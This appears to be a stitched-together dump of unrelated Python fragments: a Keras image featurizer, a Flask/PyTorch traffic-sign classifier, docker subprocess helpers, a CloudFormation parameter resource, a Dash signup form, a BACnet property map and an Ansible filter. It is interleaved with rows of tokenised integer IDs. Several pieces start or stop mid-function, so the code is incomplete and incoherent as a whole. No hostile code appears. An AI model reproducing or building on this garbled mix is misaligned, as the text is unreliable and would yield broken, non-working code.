' {}? Regardless, please choose an integer divisor.'
.format(num_features, num_pooled_features, recommended_downsample))
# -------------------------------------------------------- #
# Cast the pooling constant back to an int from a float if it passes the tests
return int(pooling_constant)
@t.guard(tensor=t.Any(), number_splices=t.Int(gte=1))
def _splice_layer(tensor, number_splices):
"""
Splice a layer into a number of even slices through skipping. This downsamples the layer,
and allows for operations to be performed over neighbors.
Parameters:
----------
layer: Tensor
the layer output being spliced
number_splices: int
the number of new layers the original layer is being spliced into.
NOTE: must be integer divisor of layer
Returns:
-------
list_of_spliced_layers : list of Tensor
a list of the spliced tensor sections of the original layer, with neighboring nodes
occupying the same indices across splices
"""
# -------------- #
# ERROR CHECKING #
# Need to check that the number of splices is an integer divisor of the feature
# size of the layer
num_features = tensor.shape[-1].__int__()
if num_features % number_splices:
raise ValueError('Number of splices needs to be an integer divisor of'
' the number of features. Tried to split {} features into'
' {} equal parts.'.format(num_features, number_splices))
# ------------------------------------------ #
# Split the tensor into equal parts by skipping nodes equal to the number
# of splices. This allows for merge operations over neighbor features
return [Lambda(lambda features: features[:, i::number_splices])(tensor) for i in
range(number_splices)]
@t.guard(features=t.Any(), num_pooled_features=t.Int(gte=1))
def _downsample_model_features(features, num_pooled_features):
"""
Take in a layer of a model, and downsample the layer to a specified size.
Parameters:
----------
features : Tensor
the final layer output being downsampled
num_pooled_features : int
the desired number of features to downsample to
Returns:
-------
downsampled_features : Tensor
a tensor containing the downsampled features with size = (?, num_pooled_features)
"""
# Find the pooling constant needed
pooling_constant = _find_pooling_constant(features, num_pooled_features)
# Splice the top layer into n layers, where n = pooling constant.
list_of_spliced_layers = _splice_layer(features, pooling_constant)
# Average the spliced layers to downsample
downsampled_features = average(list_of_spliced_layers)
return downsampled_features
def _check_downsampling_mismatch(downsample, num_pooled_features, output_layer_size):
"""
If downsample is flagged True, but no downsampling size is given, then automatically
downsample model. If downsample flagged false, but there is a size given, set downsample
to true.
Parameters:
----------
downsample : bool
Boolean flagging whether model is being downsampled
num_pooled_features : int
the desired number of features to downsample to
output_layer_size : int
number of nodes in the output layer being downsampled
Returns:
-------
downsample : boolean
Updated boolean flagging whether model is being downsampled
num_pooled_features : int
Updated number of features model output is being downsample to
"""
# If num_pooled_features left uninitialized, and they want to downsample,
# perform automatic downsampling
if num_pooled_features == 0 and downsample:
if output_layer_size % 2 == 0:
num_pooled_features = output_layer_size // 2
logging.warning('Automatic downsampling to {}. If you would like to set custom '
'downsampling, pass in an integer divisor of {} to '
'num_pooled_features.'.format(num_pooled_features, output_layer_size))
else:
raise ValueError('Sorry, no automatic downsampling available for this model.')
# If they have initialized num_pooled_features, but not turned on
# downsampling, downsample to what they entered
elif num_pooled_features != 0 and not downsample:
logging.info('Downsampling to {}.'.format(num_pooled_features))
downsample = True
return downsample, num_pooled_features
@t.guard(depth_of_featurizer=t.Int(gte=1, lte=4),
downsample=t.Bool,
num_pooled_features=t.Int(gte=0),
model_str=t.Enum(*supported_model_types.keys()),
loaded_model=t.Type(Model) | t.Null)
def build_featurizer(depth_of_featurizer, downsample, num_pooled_features=0,
model_str='squeezenet', loaded_model=None):
"""
Create the full featurizer.
Initialize the model, decapitate it to the appropriate depth, and check if downsampling
top-layer featurization. If so, downsample to the desired feature space
Parameters:
----------
depth_of_featurizer : int
How deep to cut the network. Can be 1, 2, 3, or 4.
downsample : bool
Boolean flagging whether to perform downsampling
num_pooled_features : int
If we downsample, integer determining how small to downsample.
NOTE: Must be integer divisor of original number of features
or 0 if we don't want to specify exact number
model_str : str
String deciding which model to use for the featurizer
loaded_model : keras.models.Model, optional
If specified - use the model for featurizing, istead of creating new one.
Returns:
-------
model: keras.models.Model
The decapitated, potentially downsampled, pre-trained image featurizer.
With no downsampling, the output features are equal to the top densely-
connected layer of the network, which depends on the depth of the model.
With downsampling, the output is equal to a downsampled average of
multiple splices of the last densely connected layer.
"""
# BUILDING INITIAL MODEL #
if loaded_model is not None:
model = loaded_model
else:
model = _initialize_model(model_str=model_str)
# DECAPITATING MODEL #
# Find the right depth from the dictionary and decapitate the model
model = _decapitate_model(model, supported_model_types[model_str]['depth'][depth_of_featurizer])
model_output = model.layers[-1].output
# Add pooling layer to the top of the now-decapitated model as the featurizer,
# if it needs to be downsampled
if len(model.layers[-1].output_shape) > 2:
model_output = GlobalAvgPool2D(name='featurizer')(model_output)
# Save the model output
num_output_features = model_output.shape[-1].__int__()
logging.info("Model decapitated.")
# DOWNSAMPLING FEATURES #
# Checking that the user's downsampling flag matches the initialization of the downsampling
(downsample, num_pooled_features) = _check_downsampling_mismatch(downsample,
num_pooled_features,
num_output_features)
# If we are downsampling the features, we add a pooling layer to the outputs
# to bring it to the correct size.
if downsample:
model_output = _downsample_model_features(model_output, num_pooled_features)
logging.info("Model downsampled.")
# Finally save the model
model = Model(inputs=model.input, outputs=model_output)
logging.info("Full featurizer is built.")
if downsample:
logging.info("Final layer feature space downsampled to {}".format(num_pooled_features))
else:
logging.info("No downsampling. Final layer feature space has size {}"
.format(num_output_features))
return model
| [
37811,
198,
1212,
2393,
7529,
351,
2615,
262,
4036,
2218,
333,
7509,
25,
198,
16,
13,
20768,
2890,
262,
554,
4516,
53,
18,
2746,
198,
17,
13,
4280,
499,
21712,
340,
284,
262,
5035,
6795,
198,
18,
13,
5588,
37687,
11347,
11,
611,
1... | 2.590885 | 5,683 |
#!/usr/bin/env python
__author__ = "Paul B. Manis"
__version__ = "0.4"
import pylibrary.plotting.plothelpers
import pylibrary.plotting.matplotlibexporter
import pylibrary.plotting.picker
import pylibrary.plotting.pyqtgraph_plothelpers
import pylibrary.plotting.styler
import pylibrary.plotting.talbotetalticks
import pylibrary.plotting.colormaps
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
834,
9800,
834,
796,
366,
12041,
347,
13,
1869,
271,
1,
198,
834,
9641,
834,
796,
366,
15,
13,
19,
1,
198,
198,
11748,
279,
2645,
4115,
13,
29487,
889,
13,
29487,
16794,
364,
198,
... | 2.821138 | 123 |
import os
from os.path import dirname
from unittest import TestCase
from unittest.mock import patch
from traits.api import Callable
from traits.has_traits import provides, HasStrictTraits
from traits.testing.unittest_tools import UnittestTools
from pybleau.app.model.plot_template_manager import PlotTemplateManager
from pybleau.app.plotting.i_plot_template_interactor import \
IPlotTemplateInteractor
HERE = dirname(__file__)
@provides(IPlotTemplateInteractor)
| [
11748,
28686,
198,
6738,
28686,
13,
6978,
1330,
26672,
3672,
198,
6738,
555,
715,
395,
1330,
6208,
20448,
198,
6738,
555,
715,
395,
13,
76,
735,
1330,
8529,
198,
198,
6738,
12796,
13,
15042,
1330,
4889,
540,
198,
6738,
12796,
13,
1013... | 3.277778 | 144 |
from pymodm import MongoModel, fields
from rulesets.models.account import Account
import pdb
class Ruleset(MongoModel):
"""
A ruleset is a set of rules defining how to play an RPG.
.. todo:: Add the whole systme of entities to be able to populate the ruleset.
"""
title = fields.CharField(min_length=6)
description = fields.CharField()
created_at = fields.DateTimeField()
updated_at = fields.DateTimeField()
creator_id = fields.ObjectIdField() | [
6738,
12972,
4666,
76,
1330,
42591,
17633,
11,
7032,
198,
6738,
3173,
1039,
13,
27530,
13,
23317,
1330,
10781,
198,
11748,
279,
9945,
198,
198,
4871,
14252,
316,
7,
44,
25162,
17633,
2599,
198,
220,
37227,
198,
220,
220,
220,
317,
317... | 3.265734 | 143 |
import logging
from allocation.allocation_solver import AllocatedEvent
from applications.models import (
ApplicationEventSchedule,
ApplicationEventScheduleResult,
ApplicationEventStatus,
ApplicationRound,
)
from applications.utils.aggregate_data import (
ApplicationEventScheduleResultAggregateDataRunner,
)
logger = logging.getLogger(__name__)
| [
11748,
18931,
198,
198,
6738,
20157,
13,
439,
5040,
62,
82,
14375,
1330,
1439,
10533,
9237,
198,
6738,
5479,
13,
27530,
1330,
357,
198,
220,
220,
220,
15678,
9237,
27054,
5950,
11,
198,
220,
220,
220,
15678,
9237,
27054,
5950,
23004,
... | 3.572816 | 103 |
from __future__ import print_function
from rsc_webapp import app
import torch
import pandas as pd
import plotly.graph_objs as go
import numpy as np
import json
from torchvision import transforms
from torch.nn import functional as F
from PIL import Image
import time
import os
import random
import string
from classifier.model_1 import visualize_stn
import matplotlib.pyplot as plt
#import torch
#from torchvision import datasets, models, transforms
def generate_filename(size=10, chars=string.ascii_uppercase + string.digits, extension='png'):
"""Creates random filename
Args:
size: length of the filename part, without dot and extention
chars: character range to draw random characters from
extension: extension to be added to the returned filenam
Returns:
random filame with extension
"""
filename = ''.join(random.choice(chars) for _ in range(size))
return filename + '.' + extension
def ml_figures(input_filename):
"""
Performs inference on the input image and returns data
to be visualized by the web page
Args:
input_filename: full path to the input file
Returns:
figures: dict list containing plotly graph with probabilities for all classes
predicted_label: a string with predicted label name
iconpath: a path to predicted sign icon
maxConfidenceValue_str: confidence value for the top prediction
eval_time_str: time it took to load and evaluate the model
filename_stn_in: path to STN input file
filename_stn_out: path to STN output file
"""
model = app.config['MODEL']
transform_evaluate = app.config['TRANSFORM_EVALUATE']
img_paths = [input_filename]
img_list = [Image.open(img_path) for img_path in img_paths]
start_time = time.perf_counter()
input_batch = torch.stack([transform_evaluate(img).to('cpu') for img in img_list])
pred_tensor = model(input_batch)
pred_probs = F.softmax(pred_tensor, dim=1).cpu().data.numpy()
end_time = time.perf_counter()
eval_time_str = "{:.4f}".format(end_time - start_time)
# app.logger.info("evaluation time: {} seconds".format(eval_time_str))
maxConfidenceValue = np.amax(pred_probs[0,:])
maxConfidenceValue_str = "{:.4f}".format(maxConfidenceValue)
maxConfidenceClass = np.where(pred_probs[0,:] == maxConfidenceValue)[0][0]
# app.logger.info('maxConfidenceClass: {}'.format(maxConfidenceClass))
# app.logger.info('maxConfidenceValue: {}'.format(maxConfidenceValue_str))
# STN Visualizations
data = torch.stack([transform_evaluate(img).to('cpu') for img in img_list])
input_grid, transformed_grid = visualize_stn( model, data)
filename_stn_in = os.path.join(app.config['UPLOAD_FOLDER'], generate_filename(10))
filename_stn_out = os.path.join(app.config['UPLOAD_FOLDER'], generate_filename(10))
plt.imsave(filename_stn_in, input_grid, cmap='Greys')
plt.imsave(filename_stn_out, transformed_grid, cmap='Greys')
iconpath = app.config['ICONS_FOLDER'] + '/'+str(maxConfidenceClass)+".png"
idx_to_labels = app.config['IDX_TO_LABELS']
labels = app.config['LABELS']
predicted_label = idx_to_labels[str(maxConfidenceClass)][1]
graph_prob = []
graph_prob.append(
go.Bar(
x = pred_probs[0],
y = labels,
orientation='h',
showlegend=False,
textposition='outside',
marker=dict(
color='rgba(23, 162, 184, 0.6)', ##17a2b8
line=dict(
color='rgba(23, 162, 184, 1.0)',
width=1)
)
)
)
'''annotations = []
probs = np.round(df.probability.tolist(), decimals=4)
for yd, xd in zip(probs, df.class_id.tolist()):
# labeling bars
annotations.append(dict(xref='x1', yref='y1',
y=xd, x=yd + 3,
text=str(yd) + '%',
font=dict(family='Arial', size=12,
color='rgb(96, 50, 171)'),
showarrow=False))
'''
layout_prob = dict(xaxis = dict(
title = 'Probability',
zeroline=False,
showline=False,
showticklabels=True,
showgrid=True,
domain=[0, 1],
autorange=False,
range=[0, 1],
tick=0.1),
yaxis = dict(dtick=1),
height=900,
#annotations=annotations,
margin=dict(l=300, r=20, t=30, b=50),
paper_bgcolor='rgb(248, 249, 250)',
plot_bgcolor='rgb(248, 249, 250)',
uniformtext=dict(minsize=9, mode='hide')
)
# append all charts to the figures list
figures = []
figures.append(dict(data=graph_prob, layout=layout_prob))
return figures, predicted_label, iconpath, maxConfidenceValue_str, eval_time_str, filename_stn_in, filename_stn_out | [
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
6738,
374,
1416,
62,
12384,
1324,
1330,
598,
198,
11748,
28034,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
7110,
306,
13,
34960,
62,
672,
8457,
355,
467,
198,
11748,
299,
3215... | 2.250334 | 2,245 |
import datetime
import hashlib
import os
import random
import string
import typing
from distutils.util import strtobool
from cfn_custom_resource import CloudFormationCustomResource
try:
from _metadata import CUSTOM_RESOURCE_NAME
except ImportError:
CUSTOM_RESOURCE_NAME = 'dummy'
REGION = os.environ['AWS_REGION']
class Parameter(CloudFormationCustomResource):
"""
Properties:
Name: str: optional: Name of the Parameter (including namespace)
Description: str: optional:
Type: enum["String", "StringList", "SecureString"]: optional:
default "String"
KeyId: str: required if Type==SecureString
Value: str: required unless using RandomValue
RandomValue: dict: optional:
Set Value to a random string with these properties:
- length: int: default=22
- charset: string: default=ascii_lowercase + ascii_uppercase + digits
- anything-else: whatever: if it is changed, the value is regenerated
Tags: list of {'Key': k, 'Value': v}: optional:
ReturnValue: bool: optional: default False
Return the value as the 'Value' attribute.
Only useful if RandomValue is used to get the plaintext version
(e.g. when creating RDS'es)
Setting this option to TRUE adds additional Update restrictions:
Any change requires a password re-generation. The resource will fail
otherwise
ReturnValueHash: bool: optional: default False
Similar to ReturnValue, but returns a value that changes whenever the
value changes in the 'ValueHash' attribute (useful to import as dummy
environment variable to trigger a re-deploy).
Same Update restrictions apply.
"""
RESOURCE_TYPE_SPEC = CUSTOM_RESOURCE_NAME
DISABLE_PHYSICAL_RESOURCE_ID_GENERATION = True # Use Name instead
handler = Parameter.get_handler()
| [
11748,
4818,
8079,
198,
11748,
12234,
8019,
198,
11748,
28686,
198,
11748,
4738,
198,
11748,
4731,
198,
11748,
19720,
198,
6738,
1233,
26791,
13,
22602,
1330,
965,
83,
672,
970,
198,
198,
6738,
269,
22184,
62,
23144,
62,
31092,
1330,
10... | 2.754558 | 713 |
import logging
import flask
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from app import app
from db_users import create_new_user
from db_model import load_engine
FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
username_group = dbc.FormGroup(
[
dbc.Input(name="username", placeholder="Enter new username")
],
)
password_group = dbc.FormGroup(
[
dbc.Input(type="password", name="password", placeholder="Enter a unique password")
]
)
form = dbc.Col(
dbc.Card(
dbc.CardBody([
# for some reason, this does NOT work with dbc.Form
# will not hit the /submit route
html.H4("New Account"),
html.Br(),
html.Form(
[
username_group,
password_group,
dbc.Button("Submit", id="submit-button", block=True, color="primary")
],
id="uname-pw-submit",
action="/submit",
method="post"
)
])
),
md=4
)
layout = html.Div(
[
dbc.Row(dbc.Col(html.Br(), md=12)),
dbc.Row(
[
dbc.Col(md=4),
form,
dbc.Col(html.Div(id="submit-message"), md=4)
]
),
dbc.Row()
]
)
@app.server.route("/submit", methods=["POST"]) | [
11748,
18931,
198,
198,
11748,
42903,
198,
11748,
14470,
62,
18769,
26418,
62,
5589,
3906,
355,
288,
15630,
198,
11748,
14470,
62,
7295,
62,
5589,
3906,
355,
288,
535,
198,
11748,
14470,
62,
6494,
62,
5589,
3906,
355,
27711,
198,
6738,
... | 1.985915 | 781 |
import ast
import copy
#import numpy as np
import math
import logging
logger = logging.getLogger('CryptoArbitrageApp')
| [
11748,
6468,
198,
11748,
4866,
198,
2,
11748,
299,
32152,
355,
45941,
198,
11748,
10688,
198,
11748,
18931,
198,
198,
6404,
1362,
796,
18931,
13,
1136,
11187,
1362,
10786,
23919,
78,
3163,
2545,
8394,
4677,
11537,
628,
628,
628
] | 3.205128 | 39 |
import math
import csv
nCols = 20
# read the bin file and construct the matrix
# Thanks to Jimmy
# convert the cui to int
# Thanks to Jimmy
# a method to read the cui -> term csv file and construct a dict
| [
11748,
10688,
198,
11748,
269,
21370,
198,
198,
77,
5216,
82,
796,
1160,
628,
198,
2,
1100,
262,
9874,
2393,
290,
5678,
262,
17593,
198,
2,
6930,
284,
12963,
628,
198,
2,
10385,
262,
269,
9019,
284,
493,
198,
2,
6930,
284,
12963,
... | 3.365079 | 63 |
import os | [
11748,
28686
] | 4.5 | 2 |
#!/usr/bin/env python3
#
# Corey Goldberg, Dec 2012
#
import os
import sys
import xml.etree.ElementTree as ET
"""Merge multiple JUnit XML files into a single results file.
Output dumps to sdtdout.
example usage:
$ python merge_junit_results.py results1.xml results2.xml > results.xml
"""
if __name__ == '__main__':
main()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
198,
2,
220,
24154,
31225,
11,
4280,
2321,
198,
2,
198,
198,
11748,
28686,
198,
11748,
25064,
198,
11748,
35555,
13,
316,
631,
13,
20180,
27660,
355,
12152,
628,
198,
37811,
1... | 2.922414 | 116 |
# coding=utf-8
"""Author: Konrad Zemek
Copyright (C) 2015 ACK CYFRONET AGH
This software is released under the MIT license cited in 'LICENSE.txt'
Functions wrapping capabilities of docker binary.
"""
import json
import os
import subprocess
import sys
from six import string_types
# Adds a bind-mount consistency option depending on the container's access_level.
# This option applies to macOS only, otherwise is ignored by Docker. It relaxes
# the consistency guarantees between the host and container:
# * cached - the host is authoritative, writes on host may not be immediately
# visible on the container. Improves performance of read-heavy
# workloads.
# * delegated - the container is authoritative, writes on the container may
# not be immediately visible on the host, but they will be
# flushed before the container exit. Improves performance of
# write-heavy workloads.
# noinspection PyDefaultArgument
def cp(container, src_path, dest_path, to_container=False, docker_host=None):
"""Copying file between docker container and host
:param container: str, docker id or name
:param src_path: str
:param dest_path: str
:param to_container: bool, if True file will be copied from host to
container, otherwise from docker container to host
:param docker_host: dict
"""
cmd = ["docker", "cp"]
if to_container:
cmd.extend([src_path, "{0}:{1}".format(container, dest_path)])
else:
cmd.extend(["{0}:{1}".format(container, src_path), dest_path])
if docker_host:
cmd = wrap_in_ssh_call(cmd, docker_host)
subprocess.check_call(cmd)
def login(user, password, repository='hub.docker.com'):
"""Logs into docker repository."""
subprocess.check_call(['docker', 'login', '-u', user, '-p', password,
repository])
def build_image(image, build_args):
"""Builds and tags docker image."""
subprocess.check_call(['docker', 'build', '--no-cache', '--force-rm', '-t',
image] + build_args)
def tag_image(image, tag):
"""Tags docker image."""
subprocess.check_call(['docker', 'tag', image, tag])
def push_image(image):
"""Pushes docker image to the repository."""
subprocess.check_call(['docker', 'push', image])
def pull_image(image):
"""Pulls docker image from the repository."""
subprocess.check_call(['docker', 'pull', image])
def remove_image(image):
"""Removes docker image."""
subprocess.check_call(['docker', 'rmi', '-f', image])
def ps(all=False, quiet=False, filters=None):
"""
List containers
"""
cmd = ["docker", "ps"]
if all:
cmd.append("--all")
if quiet:
cmd.append("--quiet")
if filters:
for f in filters:
cmd.extend(['-f', '{}={}'.format(f[0], f[1])])
return subprocess.check_output(cmd, universal_newlines=True).split()
def list_volumes(quiet=True):
"""
List volumes
"""
cmd = ["docker", "volume", "ls"]
if quiet:
cmd.append("--quiet")
return subprocess.check_output(cmd, universal_newlines=True).split()
def remove_volumes(volumes, timeout=None, stderr=None):
"""
Remove volumes
"""
cmd = ["docker", "volume", "rm"]
if isinstance(volumes, str):
cmd.append(volumes)
else:
cmd.extend(volumes)
if timeout is not None:
cmd = add_timeout_cmd(cmd, timeout)
return subprocess.check_call(cmd, stderr=stderr)
def connect_docker_to_network(network, container):
"""
Connect docker to the network
Useful when dockers are in different subnetworks and they need to see each other using IP address
"""
subprocess.check_call(['docker', 'network', 'connect', network, container])
| [
2,
19617,
28,
40477,
12,
23,
198,
37811,
13838,
25,
17431,
6335,
1168,
368,
988,
198,
15269,
357,
34,
8,
1853,
7125,
42,
30440,
10913,
1340,
2767,
13077,
39,
198,
1212,
3788,
318,
2716,
739,
262,
17168,
5964,
9181,
287,
705,
43,
214... | 2.712571 | 1,416 |
import enum
bacnet_name_map = {
"acked-transitions": "0",
"ack-required": "1",
"action": "2",
"action-text": "3",
"active-text": "4",
"active-vt-sessions": "5",
"alarm-value": "6",
"alarm-values": "7",
"all": "8",
"all-writes-successful": "9",
"apdu-segment-timeout": "10",
"apdu-timeout": "11",
"application-software-version": "12",
"archive": "13",
"bias": "14",
"change-of-state-count": "15",
"change-of-state-time": "16",
"notification-class": "17",
"controlled-variable-reference": "19",
"controlled-variable-units": "20",
"controlled-variable-value": "21",
"cov-increment": "22",
"date-list": "23",
"daylight-savings-status": "24",
"deadband": "25",
"derivative-constant": "26",
"derivative-constant-units": "27",
"description": "28",
"description-of-halt": "29",
"device-address-binding": "30",
"device-type": "31",
"effective-period": "32",
"elapsed-active-time": "33",
"error-limit": "34",
"event-enable": "35",
"event-state": "36",
"event-type": "37",
"exception-schedule": "38",
"fault-values": "39",
"feedback-value": "40",
"file-access-method": "41",
"file-size": "42",
"file-type": "43",
"firmware-revision": "44",
"high-limit": "45",
"inactive-text": "46",
"in-process": "47",
"instance-of": "48",
"integral-constant": "49",
"integral-constant-units": "50",
"limit-enable": "52",
"list-of-group-members": "53",
"list-of-object-property-references": "54",
"local-date": "56",
"local-time": "57",
"location": "58",
"low-limit": "59",
"manipulated-variable-reference": "60",
"maximum-output": "61",
"max-apdu-length-accepted": "62",
"max-info-frames": "63",
"max-master": "64",
"max-pres-value": "65",
"minimum-off-time": "66",
"minimum-on-time": "67",
"minimum-output": "68",
"min-pres-value": "69",
"model-name": "70",
"modification-date": "71",
"notify-type": "72",
"number-of-apdu-retries": "73",
"number-of-states": "74",
"object identifier": "75",
"object-identifier": "75",
"object-list": "76",
"object-name": "77",
"object-property-reference": "77",
"object type": "79",
"object-type": "79",
"optional": "80",
"out-of-service": "81",
"output-units": "82",
"event-parameters": "83",
"polarity": "84",
"present value": "85",
"present-value": "85",
"priority": "86",
"priority-array": "87",
"priority-for-writing": "88",
"process-identifier": "89",
"program-change": "90",
"program-location": "91",
"program-state": "92",
"proportional-constant": "93",
"proportional-constant-units": "94",
"protocol-object-types-supported": "96",
"protocol-services-supported": "97",
"protocol-version": "98",
"read-only": "99",
"reason-for-halt": "100",
"recipient-list": "102",
"reliability": "103",
"relinquish-default": "104",
"required": "105",
"resolution": "106",
"segmentation-supported": "107",
"setpoint": "108",
"setpoint-reference": "109",
"state-text": "110",
"status-flags": "111",
"system-status": "112",
"time-delay": "113",
"time-of-active-time-reset": "114",
"time-of-state-count-reset": "115",
"time-synchronization-recipients": "116",
"units": "117",
"update-interval": "118",
"utc-offset": "119",
"vendor-identifier": "120",
"vendor-name": "121",
"vt-classes-supported": "122",
"weekly-schedule": "123",
"attempted-samples": "124",
"average-value": "125",
"buffer-size": "126",
"client-cov-increment": "127",
"cov-resubscription-interval": "128",
"event-time-stamps": "130",
"log-buffer": "131",
"log-device-object-property": "132",
"enable": "133",
"log-interval": "134",
"maximum-value": "135",
"minimum-value": "136",
"notification-threshold": "137",
"protocol-revision": "139",
"records-since-notification": "140",
"record-count": "141",
"start-time": "142",
"stop-time": "143",
"stop-when-full": "144",
"total-record-count": "145",
"valid-samples": "146",
"window-interval": "147",
"window-samples": "148",
"maximum-value-timestamp": "149",
"minimum-value-timestamp": "150",
"variance-value": "151",
"active-cov-subscriptions": "152",
"backup-failure-timeout": "153",
"configuration-files": "154",
"database-revision": "155",
"direct-reading": "156",
"last-restore-time": "157",
"maintenance-required": "158",
"member-of": "159",
"mode": "160",
"operation-expected": "161",
"setting": "162",
"silenced": "163",
"tracking-value": "164",
"zone-members": "165",
"life-safety-alarm-values": "166",
"max-segments-accepted": "167",
"profile-name": "168",
"auto-slave-discovery": "169",
"manual-slave-address-binding": "170",
"slave-address-binding": "171",
"slave-proxy-enable": "172",
"last-notify-record": "173",
"schedule-default": "174",
"accepted-modes": "175",
"adjust-value": "176",
"count": "177",
"count-before-change": "178",
"count-change-time": "179",
"cov-period": "180",
"input-reference": "181",
"limit-monitoring-interval": "182",
"logging-object": "183",
"logging-record": "184",
"prescale": "185",
"pulse-rate": "186",
"scale": "187",
"scale-factor": "188",
"update-time": "189",
"value-before-change": "190",
"value-set": "191",
"value-change-time": "192",
"align-intervals": "193",
"interval-offset": "195",
"last-restart-reason": "196",
"logging-type": "197",
"restart-notification-recipients": "202",
"time-of-device-restart": "203",
"time-synchronization-interval": "204",
"trigger": "205",
"utc-time-synchronization-recipients": "206",
"node-subtype": "207",
"node-type": "208",
"structured-object-list": "209",
"subordinate-annotations": "210",
"subordinate-list": "211",
"actual-shed-level": "212",
"duty-window": "213",
"expected-shed-level": "214",
"full-duty-baseline": "215",
"requested-shed-level": "218",
"shed-duration": "219",
"shed-level-descriptions": "220",
"shed-levels": "221",
"state-description": "222",
"door-alarm-state": "226",
"door-extended-pulse-time": "227",
"door-members": "228",
"door-open-too-long-time": "229",
"door-pulse-time": "230",
"door-status": "231",
"door-unlock-delay-time": "232",
"lock-status": "233",
"masked-alarm-values": "234",
"secured-status": "235",
"absentee-limit": "244",
"access-alarm-events": "245",
"access-doors": "246",
"access-event": "247",
"access-event-authentication-factor": "248",
"access-event-credential": "249",
"access-event-time": "250",
"access-transaction-events": "251",
"accompaniment": "252",
"accompaniment-time": "253",
"activation-time": "254",
"active-authentication-policy": "255",
"assigned-access-rights": "256",
"authentication-factors": "257",
"authentication-policy-list": "258",
"authentication-policy-names": "259",
"authentication-status": "260",
"authorization-mode": "261",
"belongs-to": "262",
"credential-disable": "263",
"credential-status": "264",
"credentials": "265",
"credentials-in-zone": "266",
"days-remaining": "267",
"entry-points": "268",
"exit-points": "269",
"expiry-time": "270",
"extended-time-enable": "271",
"failed-attempt-events": "272",
"failed-attempts": "273",
"failed-attempts-time": "274",
"last-access-event": "275",
"last-access-point": "276",
"last-credential-added": "277",
"last-credential-added-time": "278",
"last-credential-removed": "279",
"last-credential-removed-time": "280",
"last-use-time": "281",
"lockout": "282",
"lockout-relinquish-time": "283",
"max-failed-attempts": "285",
"members": "286",
"muster-point": "287",
"negative-access-rules": "288",
"number-of-authentication-policies": "289",
"occupancy-count": "290",
"occupancy-count-adjust": "291",
"occupancy-count-enable": "292",
"occupancy-lower-limit": "294",
"occupancy-lower-limit-enforced": "295",
"occupancy-state": "296",
"occupancy-upper-limit": "297",
"occupancy-upper-limit-enforced": "298",
"passback-mode": "300",
"passback-timeout": "301",
"positive-access-rules": "302",
"reason-for-disable": "303",
"supported-formats": "304",
"supported-format-classes": "305",
"threat-authority": "306",
"threat-level": "307",
"trace-flag": "308",
"transaction-notification-class": "309",
"user-external-identifier": "310",
"user-information-reference": "311",
"user-name": "317",
"user-type": "318",
"uses-remaining": "319",
"zone-from": "320",
"zone-to": "321",
"access-event-tag": "322",
"global-identifier": "323",
"verification-time": "326",
"base-device-security-policy": "327",
"distribution-key-revision": "328",
"do-not-hide": "329",
"key-sets": "330",
"last-key-server": "331",
"network-access-security-policies": "332",
"packet-reorder-time": "333",
"security-pdu-timeout": "334",
"security-time-window": "335",
"supported-security-algorithms": "336",
"update-key-set-timeout": "337",
"backup-and-restore-state": "338",
"backup-preparation-time": "339",
"restore-completion-time": "340",
"restore-preparation-time": "341",
"bit-mask": "342",
"bit-text": "343",
"is-utc": "344",
"group-members": "345",
"group-member-names": "346",
"member-status-flags": "347",
"requested-update-interval": "348",
"covu-period": "349",
"covu-recipients": "350",
"event-message-texts": "351",
"event-message-texts-config": "352",
"event-detection-enable": "353",
"event-algorithm-inhibit": "354",
"event-algorithm-inhibit-ref": "355",
"time-delay-normal": "356",
"reliability-evaluation-inhibit": "357",
"fault-parameters": "358",
"fault-type": "359",
"local-forwarding-only": "360",
"process-identifier-filter": "361",
"subscribed-recipients": "362",
"port-filter": "363",
"authorization-exemptions": "364",
"allow-group-delay-inhibit": "365",
"channel-number": "366",
"control-groups": "367",
"execution-delay": "368",
"last-priority": "369",
"write-status": "370",
"property-list": "371",
"serial-number": "372",
"blink-warn-enable": "373",
"default-fade-time": "374",
"default-ramp-rate": "375",
"default-step-increment": "376",
"egress-time": "377",
"in-progress": "378",
"instantaneous-power": "379",
"lighting-command": "380",
"lighting-command-default-priority": "381",
"max-actual-value": "382",
"min-actual-value": "383",
"power": "384",
"transition": "385",
"egress-active": "386"
}
| [
11748,
33829,
628,
198,
198,
65,
330,
3262,
62,
3672,
62,
8899,
796,
1391,
198,
220,
220,
220,
366,
6021,
12,
7645,
1756,
1298,
366,
15,
1600,
198,
220,
220,
220,
366,
441,
12,
35827,
1298,
366,
16,
1600,
198,
220,
220,
220,
366,
... | 2.283344 | 4,881 |
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import AmbariConfig
import threading
import os
import time
import re
import logging
logger = logging.getLogger(__name__)
if __name__ == "__main__":
main()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
7061,
6,
198,
26656,
15385,
284,
262,
24843,
10442,
5693,
357,
1921,
37,
8,
739,
530,
198,
273,
517,
18920,
5964,
11704,
13,
220,
4091,
262,
28536,
2393,
198,
17080,
6169,
351,
... | 3.780876 | 251 |
import re
from ansible import errors
class FilterModule:
"""Defines a filter module object."""
@staticmethod
def filters():
"""Returns the Ansible filter bindings dictionary."""
return {
"expand_range": FilterModule.expand_range,
}
@staticmethod
def expand_range(text):
"""Expands a range specifier for interface to a list."""
# Look for at least one non-whitespace character for the base
# followed by a range spec: [x:y] where x and y are integers
result = re.findall(r"^(\S+)(\[\d+:\d+\])$", text)
# Check if we have a valid match
# "Loopback100[1:3]" yields [('Loopback100', '[1:3]')]
# but "Loopback100" yields []
if result:
# Process the range spec '[1:3]' into start and stop as strings
start, stop = result[0][1].strip("[]").split(":")
# Generate the expanded list by appending numbers to the
# base string from the provided range
base = result[0][0]
expanded_list = []
